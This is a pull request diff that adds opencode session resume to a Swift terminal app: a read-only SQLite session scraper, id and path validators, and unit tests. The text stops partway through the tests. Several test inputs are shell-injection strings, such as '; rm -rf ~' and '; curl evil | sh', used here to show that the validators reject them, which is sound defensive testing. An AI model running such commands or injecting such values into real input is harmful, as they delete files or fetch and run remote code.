### PR TITLE
feat(conversation): opencode exact-session resume via plugin rail (C11-151)

### DIFF
--- a/CLI/c11.swift
+++ b/CLI/c11.swift
@@ -12097,9 +12097,35 @@ struct CMUXCLI {
                 action: "skip: state=\(state) not auto-resumable"
             )
         }
-        // Only claude-code keeps an on-disk transcript today; that is the kind
-        // the crash-recovery fix verifies. Other kinds demote to unknown on a
-        // crash (no transcript), so they would not auto-resume after a crash.
+        // opencode (C11-151): exact-session resume re-attaches the
+        // interactive TUI with `cd '<cwd>' && opencode -s '<id>'`. Mirrors
+        // `OpencodeStrategy.resume`, which resumes any alive/suspended ref
+        // with a valid base62 id regardless of transcript (the SQLite
+        // transcript check is crash-recovery-only, applied by the app's
+        // `transcriptExists` before this state is reached). The session id
+        // is base62-validated, so single-quoting is injection-safe.
+        if kind == "opencode" {
+            guard isValidOpencodeSessionId(id) else {
+                return StateVerifyPanel(
+                    kind: kind, id: id, state: state, cwd: cwd,
+                    transcriptPresent: nil, wouldResume: false,
+                    action: "skip: invalid id grammar"
+                )
+            }
+            var command = "opencode -s '\(id)'"
+            if let cwd, !cwd.isEmpty, isValidOpencodeSessionProjectDir(cwd) {
+                command = "cd '\(cwd)' && \(command)"
+            }
+            return StateVerifyPanel(
+                kind: kind, id: id, state: state, cwd: cwd,
+                transcriptPresent: nil, wouldResume: true,
+                action: command
+            )
+        }
+        // Only claude-code keeps an on-disk file transcript; that is the kind
+        // the crash-recovery fix verifies via the filesystem. Other kinds
+        // demote to unknown on a crash (no transcript), so they would not
+        // auto-resume after a crash.
         guard kind == "claude-code" else {
             return StateVerifyPanel(
                 kind: kind, id: id, state: state, cwd: cwd,

--- a/GhosttyTabs.xcodeproj/project.pbxproj
+++ b/GhosttyTabs.xcodeproj/project.pbxproj
@@ -83,6 +83,8 @@
 		756290E56A4FC7D6546C1D46 /* PaneSizePolicyTests.swift in Sources */ = {isa = PBXBuildFile; fileRef = 4B2DBF12A2F90CBDE7F6A289 /* PaneSizePolicyTests.swift */; };
 		767FF8ADAC0F182A4534E12B /* ClaudeCodeScraper.swift in Sources */ = {isa = PBXBuildFile; fileRef = AD94535AC5F0BF88B5CDEDDF /* ClaudeCodeScraper.swift */; };
 		78EC4CE4D9938FD4611E1664 /* LaunchResumePicker.swift in Sources */ = {isa = PBXBuildFile; fileRef = C2BBF3CDB766B1FCF30BB765 /* LaunchResumePicker.swift */; };
+		7FFBFB92E1EA4343FB71DCA8 /* OpencodeResumeTests.swift in Sources */ = {isa = PBXBuildFile; fileRef = C585662B5CFF4AFB27E65C1E /* OpencodeResumeTests.swift */; };
+		80AB58969BB8EC6059C099DA /* OpencodeScraper.swift in Sources */ = {isa = PBXBuildFile; fileRef = 1AF4B917D915F1E0B37511F0 /* OpencodeScraper.swift */; };
 		80F4D68E68BB1DD399C78091 /* WorkspaceMetadataValidatorTests.swift in Sources */ = {isa = PBXBuildFile; fileRef = D70A4BF1A1B2C3D4E5F60718 /* WorkspaceMetadataValidatorTests.swift */; };
 		82BBB769071BCA11F1484D56 /* SessionPersistenceTests.swift in Sources */ = {isa = PBXBuildFile; fileRef = F5000001A1B2C3D4E5F60718 /* SessionPersistenceTests.swift */; };
 		849745EAE2900598F862D0F9 /* SurfaceTypeAvailabilityTests.swift in Sources */ = {isa = PBXBuildFile; fileRef = A2CADD0C9B7E43A29D723366 /* SurfaceTypeAvailabilityTests.swift */; };
@@ -429,6 +431,7 @@
 		14920F1F89F560F631520E65 /* ScrapeCapturePipeline.swift */ = {isa = PBXFileReference; includeInIndex = 1; lastKnownFileType = sourcecode.swift; path = Conversation/ScrapeCapturePipeline.swift; sourceTree = "<group>"; };
 		14A7DC53B9CA33BE2A421711 /* WorkspacePullRequestSidebarTests.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = WorkspacePullRequestSidebarTests.swift; sourceTree = "<group>"; };
 		14C14C792CC3845B19215A4A /* WorkspaceConversationResumeTests.swift */ = {isa = PBXFileReference; includeInIndex = 1; lastKnownFileType = sourcecode.swift; path = WorkspaceConversationResumeTests.swift; sourceTree = "<group>"; };
+		1AF4B917D915F1E0B37511F0 /* OpencodeScraper.swift */ = {isa = PBXFileReference; includeInIndex = 1; lastKnownFileType = sourcecode.swift; name = OpencodeScraper.swift; path = Conversation/Scrapers/OpencodeScraper.swift; sourceTree = "<group>"; };
 		1D301919B10F22B8708E8883 /* WorkspaceManualUnreadTests.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = WorkspaceManualUnreadTests.swift; sourceTree = "<group>"; };
 		3536E1F26D365D81206EFAAC /* SnapshotBridge.swift */ = {isa = PBXFileReference; includeInIndex = 1; lastKnownFileType = sourcecode.swift; name = SnapshotBridge.swift; path = Conversation/SnapshotBridge.swift; sourceTree = "<group>"; };
 		3566F50A753107233CC16743 /* DefaultAgentResolver.swift */ = {isa = PBXFileReference; includeInIndex = 1; lastKnownFileType = sourcecode.swift; path = DefaultAgentResolver.swift; sourceTree = "<group>"; };
@@ -634,6 +637,7 @@
 		C1CDE00001A1B2C3D4E5F719 /* codex */ = {isa = PBXFileReference; lastKnownFileType = text.script.sh; path = Resources/bin/codex; sourceTree = SOURCE_ROOT; };
 		C28AE9F41DE55AB88CAE431D /* AgentManifest.swift */ = {isa = PBXFileReference; includeInIndex = 1; lastKnownFileType = sourcecode.swift; path = AgentManifest.swift; sourceTree = "<group>"; };
 		C2BBF3CDB766B1FCF30BB765 /* LaunchResumePicker.swift */ = {isa = PBXFileReference; includeInIndex = 1; lastKnownFileType = sourcecode.swift; path = LaunchResumePicker.swift; sourceTree = "<group>"; };
+		C585662B5CFF4AFB27E65C1E /* OpencodeResumeTests.swift */ = {isa = PBXFileReference; includeInIndex = 1; lastKnownFileType = sourcecode.swift; name = OpencodeResumeTests.swift; path = OpencodeResumeTests.swift; sourceTree = "<group>"; };
 		C9B78D8232EFC5CF6A718EA7 /* StateDirectoryMigrationTests.swift */ = {isa = PBXFileReference; includeInIndex = 1; lastKnownFileType = sourcecode.swift; path = StateDirectoryMigrationTests.swift; sourceTree = "<group>"; };
 		CAF36E561D6A305F11ADE793 /* ConversationSnapshotBridgeTests.swift */ = {isa = PBXFileReference; includeInIndex = 1; lastKnownFileType = sourcecode.swift; path = ConversationSnapshotBridgeTests.swift; sourceTree = "<group>"; };
 		CC1299AE998DF9F78A383294 /* ClaudeCode.swift */ = {isa = PBXFileReference; includeInIndex = 1; lastKnownFileType = sourcecode.swift; name = ClaudeCode.swift; path = Conversation/Strategies/ClaudeCode.swift; sourceTree = "<group>"; };
@@ -1054,6 +1058,7 @@
 				B782D0384E99BB0E082FBBBF /* ConversationScraper.swift */,
 				9BFB0FCD7F3834654919F820 /* ConversationScraperRegistry.swift */,
 				14920F1F89F560F631520E65 /* ScrapeCapturePipeline.swift */,
+				1AF4B917D915F1E0B37511F0 /* OpencodeScraper.swift */,
 			);
 			path = Sources;
 			sourceTree = "<group>";
@@ -1213,6 +1218,7 @@
 				A2CADD0C9B7E43A29D723366 /* SurfaceTypeAvailabilityTests.swift */,
 				FBA0F437E5CCBA5E90C3EC3F /* AgentManifestTests.swift */,
 				B03F186DDAF8E10C83FC63CF /* ScrapeCapturePipelineTests.swift */,
+				C585662B5CFF4AFB27E65C1E /* OpencodeResumeTests.swift */,
 			);
 			path = c11Tests;
 			sourceTree = "<group>";
@@ -1536,6 +1542,7 @@
 				849745EAE2900598F862D0F9 /* SurfaceTypeAvailabilityTests.swift in Sources */,
 				352C25FFD890137B5F7A23B3 /* AgentManifestTests.swift in Sources */,
 				0824BD4DE71F74CA32F9F49E /* ScrapeCapturePipelineTests.swift in Sources */,
+				7FFBFB92E1EA4343FB71DCA8 /* OpencodeResumeTests.swift in Sources */,
 			);
 			runOnlyForDeploymentPostprocessing = 0;
 		};
@@ -1712,6 +1719,7 @@
 				8574E0DF636A7359989C51A4 /* ConversationScraper.swift in Sources */,
 				48D1A7FA449F78DFC0148E27 /* ConversationScraperRegistry.swift in Sources */,
 				8FAB47C9F34672F10BB37D41 /* ScrapeCapturePipeline.swift in Sources */,
+				80AB58969BB8EC6059C099DA /* OpencodeScraper.swift in Sources */,
 			);
 			runOnlyForDeploymentPostprocessing = 0;
 		};

--- a/Sources/Conversation/Scrapers/OpencodeScraper.swift
+++ b/Sources/Conversation/Scrapers/OpencodeScraper.swift
@@ -1,0 +1,188 @@
+import Foundation
+import SQLite3
+
+/// Read-only SQLite I/O over `~/.local/share/opencode/opencode.db`, where
+/// opencode stores one row per session in the `session` table.
+///
+/// **Privacy contract** (see architecture doc §"Privacy contract for scrape"):
+/// stat-equivalent — queries `session.id` and `session.time_updated` only.
+/// The `message` and `part` tables (transcript content) are NEVER opened,
+/// copied, or logged. The query is bounded (`LIMIT 16`) and filtered to the
+/// surface's cwd via the `directory` column.
+///
+/// Scope:
+/// - At most 16 most-recent sessions for the cwd by `time_updated` DESC.
+/// - Id grammar: `ses_` + 26-char **base62** body (validated via
+///   `isValidOpencodeSessionId` as defence-in-depth — the DB is the source
+///   of truth, but a corrupt row cannot leak into a synthesized ref).
+/// - DB-locked / absent / corrupt: returns `[]`. Never crashes the caller.
+///   A 2 s busy-timeout is configured so a transient opencode write does
+///   not fail the read.
+///
+/// This scraper deviates from `ClaudeCodeScraper` / `CodexScraper` by
+/// returning `[ConversationRef]` directly rather than `[ScrapeCandidate]`:
+/// opencode has no on-disk transcript file (sessions live in SQLite), so
+/// the filesystem-shaped `ScrapeCandidate` fields (`filePath`, `size`)
+/// have no meaningful value. Callers that feed the strategy-inputs
+/// pipeline can lift each ref into a `ScrapeCandidate` if needed.
+struct OpencodeScraper: Sendable, OpencodeSessionLookup {
+    let kind: String = "opencode"
+    static let defaultMaxCandidates: Int = 16
+
+    let maxCandidates: Int
+    let homeDirectory: URL?
+
+    init(
+        homeDirectory: URL? = FileManager.default.homeDirectoryForCurrentUser,
+        maxCandidates: Int = OpencodeScraper.defaultMaxCandidates
+    ) {
+        self.homeDirectory = homeDirectory
+        self.maxCandidates = maxCandidates
+    }
+
+    /// Resolve `~/.local/share/opencode/opencode.db`. Returns nil if HOME
+    /// isn't available or the file doesn't exist (opencode never ran on
+    /// this machine).
+    func databasePath() -> URL? {
+        guard let home = homeDirectory else { return nil }
+        let url = home
+            .appendingPathComponent(".local", isDirectory: true)
+            .appendingPathComponent("share", isDirectory: true)
+            .appendingPathComponent("opencode", isDirectory: true)
+            .appendingPathComponent("opencode.db", isDirectory: false)
+        guard FileManager.default.fileExists(atPath: url.path) else { return nil }
+        return url
+    }
+
+    /// Open the opencode DB read-only with a 2 s busy-timeout. Returns nil
+    /// (and closes any partial handle) on any failure. Caller owns
+    /// `sqlite3_close`.
+    private func openDatabase() -> OpaquePointer? {
+        guard let dbURL = databasePath() else { return nil }
+        var database: OpaquePointer?
+        let openCode = sqlite3_open_v2(
+            dbURL.path,
+            &database,
+            SQLITE_OPEN_READONLY | SQLITE_OPEN_FULLMUTEX,
+            nil
+        )
+        guard openCode == SQLITE_OK, let database else {
+            sqlite3_close(database)
+            return nil
+        }
+        // 2 s busy-timeout: a transient opencode write should not fail the
+        // read. `SQLITE_BUSY` past the timeout degrades to nil/[].
+        sqlite3_busy_timeout(database, 2_000)
+        return database
+    }
+
+    /// Stat-equivalent existence check for a specific session id. The
+    /// crash-recovery backing for `OpencodeStrategy.transcriptExists`.
+    ///
+    /// - `nil`: id is malformed, or the DB is absent / cannot be opened or
+    ///   prepared (cannot verify).
+    /// - `true`: a `session` row with this id exists.
+    /// - `false`: the DB was queried and no such row exists.
+    ///
+    /// Reads `session.id` only — never transcript content. Never crashes.
+    func sessionExists(id: String) -> Bool? {
+        guard isValidOpencodeSessionId(id) else { return nil }
+        guard let database = openDatabase() else { return nil }
+        defer { sqlite3_close(database) }
+
+        let sql = "SELECT 1 FROM session WHERE id = ? LIMIT 1"
+        var statement: OpaquePointer?
+        let prepareCode = sqlite3_prepare_v2(database, sql, -1, &statement, nil)
+        guard prepareCode == SQLITE_OK, let statement else {
+            sqlite3_finalize(statement)
+            return nil
+        }
+        defer { sqlite3_finalize(statement) }
+
+        return id.withCString { cString -> Bool? in
+            guard sqlite3_bind_text(statement, 1, cString, -1, nil) == SQLITE_OK else {
+                return nil
+            }
+            switch sqlite3_step(statement) {
+            case SQLITE_ROW:
+                return true
+            case SQLITE_DONE:
+                return false
+            default:
+                // SQLITE_BUSY past timeout / SQLITE_ERROR: cannot verify.
+                return nil
+            }
+        }
+    }
+
+    /// Top-N sessions for `cwd` by `time_updated` DESC. Empty when the DB
+    /// is absent, locked past the busy-timeout, or corrupt. Never throws.
+    func scrape(cwd: String) -> [ConversationRef] {
+        let trimmedCwd = cwd.trimmingCharacters(in: .whitespacesAndNewlines)
+        guard !trimmedCwd.isEmpty else { return [] }
+        guard let database = openDatabase() else { return [] }
+        defer { sqlite3_close(database) }
+
+        let sql = """
+            SELECT id, time_updated
+            FROM session
+            WHERE directory = ?
+            ORDER BY time_updated DESC
+            LIMIT ?
+            """
+        var statement: OpaquePointer?
+        let prepareCode = sqlite3_prepare_v2(database, sql, -1, &statement, nil)
+        guard prepareCode == SQLITE_OK, let statement else {
+            sqlite3_finalize(statement)
+            return []
+        }
+        defer { sqlite3_finalize(statement) }
+
+        let limitBindResult = sqlite3_bind_int64(statement, 2, Int64(maxCandidates))
+        guard limitBindResult == SQLITE_OK else { return [] }
+
+        // Bind cwd as UTF-8 text. `withCString` guarantees a stable
+        // NUL-terminated buffer for the lifetime of the closure, so
+        // SQLITE_STATIC (nil destructor) is safe — SQLite reads but
+        // does not retain the bytes.
+        return trimmedCwd.withCString { cString in
+            let cwdBindResult = sqlite3_bind_text(
+                statement, 1, cString, -1, nil
+            )
+            guard cwdBindResult == SQLITE_OK else { return [] }
+
+            var refs: [ConversationRef] = []
+            refs.reserveCapacity(min(maxCandidates, 16))
+            while true {
+                let stepCode = sqlite3_step(statement)
+                if stepCode == SQLITE_ROW {
+                    guard let idC = sqlite3_column_text(statement, 0) else { continue }
+                    let id = String(cString: idC)
+                    let timeUpdatedMs = sqlite3_column_int64(statement, 1)
+                    let capturedAt = Date(timeIntervalSince1970: Double(timeUpdatedMs) / 1_000.0)
+                    guard isValidOpencodeSessionId(id) else { continue }
+                    refs.append(ConversationRef(
+                        kind: kind,
+                        id: id,
+                        placeholder: false,
+                        cwd: trimmedCwd,
+                        capturedAt: capturedAt,
+                        capturedVia: .scrape,
+                        state: .unknown,
+                        diagnosticReason: "scrape: session row in ~/.local/share/opencode/opencode.db"
+                    ))
+                    continue
+                }
+                if stepCode == SQLITE_DONE {
+                    break
+                }
+                // Any other step code (SQLITE_BUSY past timeout, SQLITE_ERROR,
+                // ...): the query is incomplete. Return what we have rather
+                // than crashing — partial results are still useful for
+                // crash recovery.
+                return refs
+            }
+            return refs
+        }
+    }
+}

--- a/Sources/Conversation/Strategies/Opencode.swift
+++ b/Sources/Conversation/Strategies/Opencode.swift
@@ -1,30 +1,111 @@
 import Foundation
 
-/// Fresh-launch-only strategy for Opencode. v1 does not map opencode's
-/// session storage; if a real id ever appears (via wrapper-claim with a
-/// non-placeholder id, or a future scraper) the strategy launches the
-/// process — but resume defaults to `.skip` for placeholders.
+/// Push-primary strategy for Opencode. The opencode plugin
+/// (`skills/opencode-plugins/c11-notify.js`) reports the real session id on
+/// `session.created` via `c11 conversation push --kind opencode`. Identity
+/// is deterministic on the live path; resume re-attaches the interactive
+/// TUI with `cd '<dir>' && opencode -s <id>`.
+///
+/// Id grammar: `ses_` + 26-char base62 (`isValidOpencodeSessionId`). NOT a
+/// UUID and NOT Crockford base32 — opencode session ids routinely contain
+/// `I/L/O/U`, which a Crockford alphabet would wrongly reject.
+///
+/// Resume flag note: `--dangerously-skip-permissions` is `opencode run`-only
+/// (verified against opencode 1.17.5 `--help`); the interactive command this
+/// strategy re-attaches to accepts `-s/--session` but not that flag, so the
+/// resume command is bare `opencode -s <id>`.
 struct OpencodeStrategy: ConversationStrategy {
     let kind: String = "opencode"
 
-    init() {}
+    /// Injectable session-existence lookup for the crash-recovery
+    /// `transcriptExists` seam. Defaults to a real `OpencodeScraper` reading
+    /// `~/.local/share/opencode/opencode.db`; tests inject a scraper pointed
+    /// at a temp DB.
+    private let sessionLookup: @Sendable (_ homeDirectory: URL?) -> any OpencodeSessionLookup
+
+    init(
+        sessionLookup: @escaping @Sendable (_ homeDirectory: URL?) -> any OpencodeSessionLookup = { home in
+            OpencodeScraper(homeDirectory: home)
+        }
+    ) {
+        self.sessionLookup = sessionLookup
+    }
 
     func capture(inputs: ConversationStrategyInputs) -> ConversationRef? {
+        // Push-primary: the plugin's `session.created` hook value wins.
         if let push = inputs.push, !push.placeholder {
             return push
         }
+        // Pull-fallback (Phase B wiring): a scrape candidate carrying the
+        // session id in its `id` field. Left `.unknown` until the live
+        // scrape-capture pipeline can confirm it.
+        if let candidate = inputs.scrapeCandidates.first,
+           isValidOpencodeSessionId(candidate.id) {
+            return ConversationRef(
+                kind: kind,
+                id: candidate.id,
+                placeholder: false,
+                cwd: candidate.cwd ?? inputs.cwd,
+                capturedAt: candidate.mtime,
+                capturedVia: .scrape,
+                state: .unknown,
+                diagnosticReason: "scrape: session row in ~/.local/share/opencode/opencode.db"
+            )
+        }
+        // Wrapper-claim only: nothing concrete to resume yet.
         return inputs.wrapperClaim
     }
 
     func resume(ref: ConversationRef) -> ResumeAction {
-        if ref.placeholder {
-            return .skip(reason: "fresh-launch-only")
+        guard !ref.placeholder else {
+            return .skip(reason: "placeholder; no opencode session resolved yet")
         }
         switch ref.state {
-        case .alive, .suspended:
-            return .typeCommand(text: conversationShellQuote("opencode"), submitWithReturn: true)
-        default:
+        case .unknown:
+            return .skip(reason: "state=unknown not auto-resumable")
+        case .tombstoned, .unsupported:
             return .skip(reason: "state=\(ref.state.rawValue) not auto-resumable")
+        case .alive, .suspended:
+            break
         }
+        guard isValidOpencodeSessionId(ref.id) else {
+            return .skip(reason: "invalid id grammar")
+        }
+        let quotedId = conversationShellQuote(ref.id)
+        var command = "opencode -s \(quotedId)"
+        // cd into the recorded project dir first when present and valid —
+        // opencode resolves session state relative to the launching cwd.
+        if let cwd = ref.cwd?.trimmingCharacters(in: .whitespacesAndNewlines),
+           !cwd.isEmpty,
+           isValidOpencodeSessionProjectDir(cwd) {
+            command = "cd \(conversationShellQuote(cwd)) && \(command)"
+        }
+        return .typeCommand(text: command, submitWithReturn: true)
     }
+
+    func isValidId(_ id: String) -> Bool {
+        isValidOpencodeSessionId(id)
+    }
+
+    /// Crash-recovery verification: stat-equivalent existence check against
+    /// the opencode SQLite `session` table. Never opens transcript content
+    /// (the `message`/`part` tables) — privacy contract.
+    ///
+    /// Three-valued per the protocol: `nil` when the DB is unavailable or
+    /// the id is malformed (cannot verify → caller leaves the ref
+    /// `.unknown`); `true`/`false` when the DB can be read.
+    func transcriptExists(
+        for ref: ConversationRef,
+        filesystem: ConversationFilesystem
+    ) -> Bool? {
+        sessionLookup(filesystem.homeDirectory).sessionExists(id: ref.id)
+    }
+}
+
+/// Narrow seam over the opencode session store so `OpencodeStrategy` can be
+/// unit-tested without a live `~/.local/share/opencode/opencode.db`.
+protocol OpencodeSessionLookup: Sendable {
+    /// `nil` = DB unavailable or id invalid (cannot verify); `true`/`false`
+    /// = the DB was read and the session row is present/absent.
+    func sessionExists(id: String) -> Bool?
 }

--- a/Sources/SurfaceMetadataStore.swift
+++ b/Sources/SurfaceMetadataStore.swift
@@ -179,7 +179,9 @@ final class SurfaceMetadataStore: @unchecked Sendable {
         "worktree",
         "branch",
         "claude.session_id",
-        "claude.session_project_dir"
+        "claude.session_project_dir",
+        "opencode.session_id",
+        "opencode.session_project_dir"
     ]
 
     static func validateReservedKey(_ key: String, _ value: Any) -> WriteError? {
@@ -282,6 +284,37 @@ final class SurfaceMetadataStore: @unchecked Sendable {
                 return .reservedKeyInvalidType(key, "expected string")
             }
             if !isValidClaudeSessionProjectDir(s) {
+                return .reservedKeyInvalidType(
+                    key,
+                    "must be an absolute POSIX path (≤4096 chars, no NUL/newline/single-quote)"
+                )
+            }
+            return nil
+        case "opencode.session_id":
+            // opencode's `session.created` id is `ses_` + 26-char base62,
+            // not a UUID. The value is interpolated into the resume
+            // command (`opencode … -s <id>`) at restore time, so a
+            // non-conforming value would be a command-injection vector.
+            // See `isValidOpencodeSessionId` for the grammar.
+            guard let s = value as? String else {
+                return .reservedKeyInvalidType(key, "expected string")
+            }
+            if !isValidOpencodeSessionId(s) {
+                return .reservedKeyInvalidType(
+                    key,
+                    "must match ses_ + 26-char base62 body"
+                )
+            }
+            return nil
+        case "opencode.session_project_dir":
+            // Project directory the opencode session was created in; same
+            // grammar as `claude.session_project_dir`. Interpolated into
+            // `cd '<path>' && …` at restore time, so reject anything that
+            // could break the single-quote escape.
+            guard let s = value as? String else {
+                return .reservedKeyInvalidType(key, "expected string")
+            }
+            if !isValidOpencodeSessionProjectDir(s) {
                 return .reservedKeyInvalidType(
                     key,
                     "must be an absolute POSIX path (≤4096 chars, no NUL/newline/single-quote)"

--- a/Sources/WorkspaceMetadataKeys.swift
+++ b/Sources/WorkspaceMetadataKeys.swift
@@ -38,6 +38,25 @@ public enum SurfaceMetadataKeyName {
     /// into the recorded directory before issuing `claude --resume`.
     public static let claudeSessionProjectDir = "claude.session_project_dir"
 
+    /// Surface-scoped session id written by the opencode `session.created`
+    /// plugin hook. Opencode session IDs are `ses_` + a 26-character
+    /// **base62** body (`[0-9A-Za-z]`), NOT UUIDs — see
+    /// `isValidOpencodeSessionId`. The `opencode.*` prefix mirrors the
+    /// `claude.*` reservation and does not collide with the C11-13
+    /// `mailbox.*` namespace.
+    public static let opencodeSessionId = "opencode.session_id"
+
+    /// Surface-scoped project directory the opencode session was created
+    /// in (its cwd at session start). Written alongside
+    /// `opencode.session_id` by the same hook. The pair is atomic for the
+    /// same reason `claude.session_project_dir` is: opencode resolves
+    /// session state relative to the launching cwd, so a session captured
+    /// in a worktree subdir cannot be resumed from its parent. Same
+    /// grammar as the claude project-dir key — validated via
+    /// `isValidOpencodeSessionProjectDir`, which delegates to the shared
+    /// `isValidClaudeSessionProjectDir`.
+    public static let opencodeSessionProjectDir = "opencode.session_project_dir"
+
     /// Canonical `terminal_type` key (same literal as
     /// `SurfaceMetadataStore.reservedKeys`). Named here for executor
     /// readability; validation still flows through the store's reserved
@@ -73,6 +92,46 @@ nonisolated public func isValidClaudeSessionProjectDir(_ candidate: String) -> B
         }
     }
     return true
+}
+
+/// Grammar for `opencode.session_id`: `ses_` + a 26-character **base62**
+/// body (`[0-9A-Za-z]`). Verified against a live opencode 1.17.5 store —
+/// all 131 local `session` rows match this exactly, and 83 of them contain
+/// `I`/`L`/`O`/`U` in the body. A Crockford-base32 alphabet (which excludes
+/// those four letters) would wrongly reject those 83 ids, so base62 is the
+/// load-bearing grammar, not a stylistic choice. Anchored so any
+/// non-matching prefix/suffix — shell metacharacters, embedded newlines,
+/// extra tokens — is rejected. Declared `nonisolated` + `public` so
+/// `SurfaceMetadataStore.validateReservedKey` (off the main actor) and the
+/// strategy/CLI validation share one compiled regex without cross-actor
+/// traffic.
+///
+/// Defence in depth mirrors `isValidClaudeSessionId`: the store rejects
+/// malformed writes at the boundary; the strategy re-validates at resume
+/// time so a value that slipped past the store cannot become a shell
+/// command.
+let opencodeSessionIdPattern: NSRegularExpression = {
+    // swiftlint:disable:next force_try
+    return try! NSRegularExpression(
+        pattern: "^ses_[0-9A-Za-z]{26}$",
+        options: []
+    )
+}()
+
+/// Returns true iff `candidate` matches `ses_` + 26-char base62 body
+/// exactly. Trims nothing — callers normalise whitespace before calling.
+nonisolated public func isValidOpencodeSessionId(_ candidate: String) -> Bool {
+    let range = NSRange(location: 0, length: (candidate as NSString).length)
+    return opencodeSessionIdPattern.firstMatch(in: candidate, options: [], range: range) != nil
+}
+
+/// Path grammar for `opencode.session_project_dir`. Identical to
+/// `claude.session_project_dir` (absolute POSIX path, no NUL/newline/
+/// carriage-return/single-quote, ≤4096). Delegates to the shared
+/// `isValidClaudeSessionProjectDir` rather than duplicating the body — the
+/// grammar is operator-path-shaped, not agent-specific.
+nonisolated public func isValidOpencodeSessionProjectDir(_ candidate: String) -> Bool {
+    return isValidClaudeSessionProjectDir(candidate)
 }
 
 /// Validation for workspace metadata writes.

--- a/c11Tests/OpencodeResumeTests.swift
+++ b/c11Tests/OpencodeResumeTests.swift
@@ -1,0 +1,336 @@
+import XCTest
+import SQLite3
+
+#if canImport(c11_DEV)
+@testable import c11_DEV
+#elseif canImport(c11)
+@testable import c11
+#endif
+
+/// C11-151 — opencode exact-session resume via the plugin push rail.
+///
+/// These are pure/behavioral logic tests in the SAFE `c11LogicTests` target
+/// (they do not launch a host app). They cover the load-bearing base62
+/// grammar (the WIP Crockford regex wrongly rejected 63% of real session
+/// ids), the reserved-key validators, the `OpencodeStrategy` resume/capture
+/// surface, and the `OpencodeScraper` SQLite reader exercised against a real
+/// temp database. The host-scheme `ConversationStrategyTests` cover the
+/// other v1 strategies; opencode strategy coverage is deliberately
+/// co-located here so the local gate exercises this ticket's code.
+
+// MARK: - Grammar
+
+final class OpencodeSessionIdGrammarTests: XCTestCase {
+
+    /// Real ids pulled from a live opencode 1.17.5 store. The first three
+    /// contain I/L/O/U in the body — a Crockford-base32 alphabet would
+    /// wrongly reject them. This is the regression guard for the WIP bug.
+    func testAcceptsRealBase62IdsIncludingILOU() {
+        let real = [
+            "ses_0fda89a49ffeLHwJXtrxnn4X6g",   // L, H, J, X
+            "ses_0fd8a6fffffe6JzzcloHmtDV0R",   // o, l, H, D, V, R
+            "ses_0fd8cb310ffe2of6OsP2qYz4Q5",   // O present
+            "ses_0f5b10b09ffeb2G3Y53oze86wV"
+        ]
+        for id in real {
+            XCTAssertTrue(isValidOpencodeSessionId(id), "should accept real id \(id)")
+        }
+    }
+
+    func testRejectsWrongPrefix() {
+        XCTAssertFalse(isValidOpencodeSessionId("sess_0fda89a49ffeLHwJXtrxnn4X6g"))
+        XCTAssertFalse(isValidOpencodeSessionId("msg_0fda89a49ffeLHwJXtrxnn4X6g"))
+        XCTAssertFalse(isValidOpencodeSessionId("0fda89a49ffeLHwJXtrxnn4X6g"))
+    }
+
+    func testRejectsWrongLength() {
+        XCTAssertFalse(isValidOpencodeSessionId("ses_short"))
+        XCTAssertFalse(isValidOpencodeSessionId("ses_0fda89a49ffeLHwJXtrxnn4X6"))   // 25
+        XCTAssertFalse(isValidOpencodeSessionId("ses_0fda89a49ffeLHwJXtrxnn4X6gg"))  // 27
+    }
+
+    func testRejectsNonBase62BodyChars() {
+        XCTAssertFalse(isValidOpencodeSessionId("ses_0fda89a49ffeLHwJXtrxnn4X6-"))   // hyphen
+        XCTAssertFalse(isValidOpencodeSessionId("ses_0fda89a49ffeLHwJXtrxnn4X6_"))   // underscore
+    }
+
+    func testRejectsShellMetacharactersAndNewlines() {
+        XCTAssertFalse(isValidOpencodeSessionId("ses_0fda89a49ffeLHwJXtrxnn4X6g; rm -rf ~"))
+        XCTAssertFalse(isValidOpencodeSessionId("ses_0fda89a49ffeLHwJXtrxnn4X6g\nrm -rf ~"))
+        XCTAssertFalse(isValidOpencodeSessionId(" ses_0fda89a49ffeLHwJXtrxnn4X6g"))   // leading space
+    }
+
+    func testProjectDirGrammarDelegatesToClaude() {
+        XCTAssertTrue(isValidOpencodeSessionProjectDir("/Users/atin/proj"))
+        XCTAssertFalse(isValidOpencodeSessionProjectDir("relative/path"))
+        XCTAssertFalse(isValidOpencodeSessionProjectDir("/Users/atin/p'roj"))  // single quote
+        XCTAssertFalse(isValidOpencodeSessionProjectDir("/Users/atin/p\nroj")) // newline
+    }
+}
+
+// MARK: - Reserved-key validation (store boundary)
+
+final class OpencodeReservedKeyValidationTests: XCTestCase {
+
+    private let store = SurfaceMetadataStore.shared
+    private let validId = "ses_0fda89a49ffeLHwJXtrxnn4X6g"
+
+    func testStoreAcceptsValidSessionId() throws {
+        let workspace = UUID(); let surface = UUID()
+        defer { store.removeSurface(workspaceId: workspace, surfaceId: surface) }
+        let result = try store.setMetadata(
+            workspaceId: workspace, surfaceId: surface,
+            partial: ["opencode.session_id": validId],
+            mode: .merge, source: .explicit
+        )
+        XCTAssertEqual(result.applied["opencode.session_id"], true)
+    }
+
+    func testStoreAcceptsValidProjectDir() throws {
+        let workspace = UUID(); let surface = UUID()
+        defer { store.removeSurface(workspaceId: workspace, surfaceId: surface) }
+        let result = try store.setMetadata(
+            workspaceId: workspace, surfaceId: surface,
+            partial: ["opencode.session_project_dir": "/Users/atin/Projects/x"],
+            mode: .merge, source: .explicit
+        )
+        XCTAssertEqual(result.applied["opencode.session_project_dir"], true)
+    }
+
+    func testStoreRejectsCrockfordExcludedAssumption() {
+        // A regression sentinel: an id containing L (excluded by Crockford)
+        // MUST be accepted, so the store must NOT throw here.
+        let workspace = UUID(); let surface = UUID()
+        defer { store.removeSurface(workspaceId: workspace, surfaceId: surface) }
+        XCTAssertNoThrow(try store.setMetadata(
+            workspaceId: workspace, surfaceId: surface,
+            partial: ["opencode.session_id": "ses_0fda89a49ffeLHwJXtrxnn4X6g"],
+            mode: .merge, source: .explicit
+        ))
+    }
+
+    func testStoreRejectsShellInjectionInSessionId() {
+        let workspace = UUID(); let surface = UUID()
+        defer { store.removeSurface(workspaceId: workspace, surfaceId: surface) }
+        XCTAssertThrowsError(try store.setMetadata(
+            workspaceId: workspace, surfaceId: surface,
+            partial: ["opencode.session_id": "ses_x; curl evil | sh"],
+            mode: .merge, source: .explicit
+        )) { error in
+            guard let e = error as? SurfaceMetadataStore.WriteError else {
+                return XCTFail("expected WriteError, got \(error)")
+            }
+            XCTAssertEqual(e.code, "reserved_key_invalid_type")
